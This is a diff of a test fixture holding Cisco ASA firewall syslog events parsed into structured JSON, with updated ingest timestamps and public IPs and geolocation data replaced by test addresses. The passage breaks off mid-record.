"2021-12-09T13:33:30.615535800Z", "original": "May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)", "code": "106014", "kind": "event", @@ -3301,7 +3278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555340Z", + "ingested": "2021-12-09T13:33:30.615541700Z", "original": "May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063", "code": "733100", "kind": "event", @@ -3384,7 +3361,7 @@ }, "event": { "severity": 3, - "ingested": "2021-10-11T11:44:17.555345600Z", + "ingested": "2021-12-09T13:33:30.615546400Z", "original": "May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2", "code": "106010", "kind": "event", @@ -3460,7 +3437,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555349200Z", + "ingested": "2021-12-09T13:33:30.615551500Z", "original": "May 5 19:02:25 dev01: %ASA-4-507003: tcp flow from fw111:10.10.10.10/49574 to out111:192.168.2.2/80 terminated by inspection engine, reason - disconnected, dropped packet.", "code": "507003", "kind": "event", @@ -3523,7 +3500,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555354900Z", + "ingested": "2021-12-09T13:33:30.615555400Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3585,7 +3562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555360400Z", + "ingested": "2021-12-09T13:33:30.615560100Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]", "code": "304001", "kind": "event", @@ -3647,7 +3624,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555366700Z", + "ingested": "2021-12-09T13:33:30.615565100Z", "original": "Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23", "code": "304001", "kind": "event", @@ -3709,7 +3686,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555370900Z", + "ingested": "2021-12-09T13:33:30.615568800Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3734,42 +3711,48 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "FR-63", - "city_name": "Clermont-Ferrand", - "country_iso_code": "FR", - "country_name": "France", - "region_name": "Puy-de-Dôme", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 3.0966, - "lat": 45.7838 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 3215, + "number": 20712, "organization": { - "name": "Orange" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "2.3.4.5", + "address": "81.2.69.144", "port": 9101, - "ip": "2.3.4.5" + "ip": "81.2.69.144" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "1.2.3.4", + "address": "81.2.69.144", "port": 54242, - "ip": "1.2.3.4" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -3804,8 +3787,7 @@ "dev01" ], "ip": [ - "1.2.3.4", - "2.3.4.5" + "81.2.69.144" ] }, "host": { @@ -3815,8 +3797,8 @@ "severity": 6, "duration": 3602000000000, "reason": "Connection timeout", - "ingested": "2021-10-11T11:44:17.555376400Z", - "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout", + "ingested": "2021-12-09T13:33:30.615573200Z", + "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "code": "302304", "kind": "event", "start": "2021-04-27T03:12:21.000Z", @@ -3893,7 +3875,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555382500Z", + "ingested": "2021-12-09T13:33:30.615577900Z", "original": "Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group \"global_access_1\"", "code": "106023", "kind": "event", @@ -3920,27 +3902,9 @@ "level": "notification" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "LV-RIX", - "city_name": "Riga", - "country_iso_code": "LV", - "country_name": "Latvia", - "region_name": "Riga", - "location": { - "lon": 24.0978, - "lat": 56.9496 - } - }, - "as": { - "number": 12578, - "organization": { - "name": "SIA Tet" - } - }, - "address": "195.122.12.242", "port": 53, - "ip": "195.122.12.242" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "source": { "port": 27218, @@ -3980,7 +3944,7 @@ "somedomainname.local" ], "ip": [ - "195.122.12.242" + "192.168.157.61" ] }, "host": { @@ -3988,8 +3952,8 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555386600Z", - "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:33:30.615582100Z", + "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -4042,7 +4006,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555391Z", + "ingested": "2021-12-09T13:33:30.615587400Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK", "code": "111004", "kind": "event", @@ -4100,7 +4064,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555394600Z", + "ingested": "2021-12-09T13:33:30.615592700Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'", "code": "111010", "kind": "event", @@ -4148,7 +4112,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555399900Z", + "ingested": "2021-12-09T13:33:30.615597300Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15", "code": "502103", "kind": "event", @@ -4226,7 +4190,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555405500Z", + "ingested": "2021-12-09T13:33:30.615601800Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD-FS-LAN:10.10.1.254/https for user \"*****\"", "code": "605004", "kind": "event", @@ -4286,7 +4250,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555411900Z", + "ingested": "2021-12-09T13:33:30.615606600Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin", "code": "611102", "kind": "event", @@ -4357,7 +4321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555419600Z", + "ingested": "2021-12-09T13:33:30.615611800Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user \"admin\"", "code": "605005", "kind": "event", @@ -4417,7 +4381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555427200Z", + "ingested": "2021-12-09T13:33:30.615615400Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin", "code": "611101", "kind": "event", @@ -4441,24 +4405,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4478,7 +4442,7 @@ "dev01" ], "ip": [ - "91.240.17.178" + "81.2.69.144" ] }, "host": { @@ -4486,8 +4450,8 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555434800Z", - "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", + "ingested": "2021-12-09T13:33:30.615620200Z", + "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "code": "713049", "kind": "event", "action": "firewall-rule", @@ -4509,31 +4473,31 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "bytes": 1216163, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "source": { "user": { - "name": "91.240.17.178", + "name": "81.2.69.144", "group": { - "name": "91.240.17.178" + "name": "81.2.69.144" } }, "bytes": 297103 @@ -4553,13 +4517,13 @@ }, "related": { "user": [ - "91.240.17.178" + "81.2.69.144" ], "hosts": [ "dev01" ], "ip": [ - "91.240.17.178" + "81.2.69.144" ] }, "host": { @@ -4569,8 +4533,8 @@ "severity": 4, "duration": 1936000000000, "reason": "User Requested", - "ingested": "2021-10-11T11:44:17.555442400Z", - "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", + "ingested": "2021-12-09T13:33:30.615655900Z", + "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "code": "113019", "kind": "event", "start": "2021-04-27T01:30:47.000Z", @@ -4629,7 +4593,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555450Z", + "ingested": "2021-12-09T13:33:30.615660Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-722051: Group \u003cVPN5Policy\u003e User \u003cjohn\u003e IP \u003c192.168.50.3\u003e IPv4 Address \u003c192.168.50.5\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", @@ -4656,25 +4620,28 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "user": { "name": "testuser" }, - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4697,7 +4664,7 @@ "dev01" ], "ip": [ - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -4706,8 +4673,8 @@ "event": { "severity": 6, "reason": "User Requested", - "ingested": "2021-10-11T11:44:17.555457500Z", - "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.", + "ingested": "2021-12-09T13:33:30.615664600Z", + "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.", "code": "716002", "kind": "event", "action": "firewall-rule", @@ -4767,7 +4734,7 @@ "event": { "severity": 6, "reason": "Idle timeout", - "ingested": "2021-10-11T11:44:17.555465300Z", + "ingested": "2021-12-09T13:33:30.615673800Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", "code": "716002", "kind": "event", @@ -4792,50 +4759,32 @@ "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-HCK", - "city_name": "Stoke Newington", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Hackney", - "location": { - "lon": -0.0765, - "lat": 51.5638 - } - }, - "as": { - "number": 8468, - "organization": { - "name": "Entanet" - } - }, - "address": "195.74.114.34", "port": 23, - "ip": "195.74.114.34" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "IE-L", - "city_name": "Dublin", - "country_iso_code": "IE", - "country_name": "Ireland", - "region_name": "Leinster", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -6.2488, - "lat": 53.3338 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 8075, + "number": 20712, "organization": { - "name": "Microsoft Corporation" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "104.46.88.19", + "address": "81.2.69.144", "port": 6370, - "ip": "104.46.88.19" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4864,8 +4813,8 @@ "dev01" ], "ip": [ - "104.46.88.19", - "195.74.114.34" + "81.2.69.144", + "192.168.157.61" ] }, "host": { @@ -4873,8 +4822,8 @@ }, "event": { "severity": 3, - "ingested": "2021-10-11T11:44:17.555473100Z", - "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23", + "ingested": "2021-12-09T13:33:30.615895700Z", + "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23", "code": "710003", "kind": "event", "action": "firewall-rule", @@ -4905,25 +4854,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 8888, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4956,7 +4905,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -4965,8 +4914,8 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555480800Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally", + "ingested": "2021-12-09T13:33:30.615901200Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "code": "434004", "kind": "event", "action": "bypass", @@ -4998,25 +4947,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.138", + "address": "81.2.69.144", "port": 8888, - "ip": "91.240.17.138" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5049,7 +4998,7 @@ "dev01" ], "ip": [ - "91.240.17.138", + "81.2.69.144", "192.168.2.2" ] }, @@ -5059,8 +5008,8 @@ "event": { "severity": 4, "action": "drop", - "ingested": "2021-10-11T11:44:17.555488500Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514", + "ingested": "2021-12-09T13:33:30.615907100Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "code": "434002", "outcome": "unknown" }, @@ -5083,25 +5032,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5129,7 +5078,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5139,8 +5088,8 @@ "event": { "severity": 6, "reason": "Failed to locate egress interface", - "ingested": "2021-10-11T11:44:17.555492700Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412", + "ingested": "2021-12-09T13:33:30.615911800Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412", "code": "110002", "kind": "event", "action": "firewall-rule", @@ -5171,25 +5120,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5222,7 +5171,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5232,8 +5181,8 @@ "event": { "severity": 4, "reason": "Duplicate TCP SYN with different initial sequence number", - "ingested": "2021-10-11T11:44:17.555496400Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", + "ingested": "2021-12-09T13:33:30.615916600Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "code": "419002", "kind": "event", "action": "firewall-rule", @@ -5262,24 +5211,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5307,7 +5256,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5317,8 +5266,8 @@ "event": { "severity": 6, "action": "created", - "ingested": "2021-10-11T11:44:17.555502Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.", + "ingested": "2021-12-09T13:33:30.615926700Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "code": "602303", "outcome": "success" }, @@ -5340,24 +5289,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5385,7 +5334,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5394,8 +5343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555507600Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.", + "ingested": "2021-12-09T13:33:30.616188100Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.", "code": "602304", "kind": "event", "action": "deleted", @@ -5429,25 +5378,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5470,7 +5419,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5480,8 +5429,8 @@ "event": { "severity": 5, "reason": "Received a IKE_INIT_SA request", - "ingested": "2021-10-11T11:44:17.555513800Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", + "ingested": "2021-12-09T13:33:30.616193300Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "code": "750002", "kind": "event", "action": "connection-started", @@ -5512,25 +5461,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5553,7 +5502,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5563,8 +5512,8 @@ "event": { "severity": 4, "reason": "Negotiation aborted due to Failed to locate an item in the database", - "ingested": "2021-10-11T11:44:17.555518Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", + "ingested": "2021-12-09T13:33:30.616198400Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "code": "750003", "kind": "event", "action": "error", @@ -5587,17 +5536,8 @@ "level": "notification" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5617,7 +5557,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { @@ -5626,8 +5566,8 @@ "event": { "severity": 5, "reason": "PHASE 2 COMPLETED", - "ingested": "2021-10-11T11:44:17.555524Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", + "ingested": "2021-12-09T13:33:30.616203400Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", "code": "713120", "kind": "event", "action": "firewall-rule", @@ -5650,17 +5590,8 @@ "level": "notification" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.64.157.61", - "ip": "192.64.157.61" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "tags": [ "preserve_original_event" @@ -5680,7 +5611,7 @@ "dev01" ], "ip": [ - "192.64.157.61" + "192.168.157.61" ] }, "host": { @@ -5689,8 +5620,8 @@ "event": { "severity": 5, "reason": "Duplicate first packet detected", - "ingested": "2021-10-11T11:44:17.555529500Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.", + "ingested": "2021-12-09T13:33:30.616208500Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.", "code": "713202", "kind": "event", "action": "firewall-rule", @@ -5710,17 +5641,8 @@ "level": "informational" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5740,7 +5662,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { @@ -5749,8 +5671,8 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-10-11T11:44:17.555533700Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: 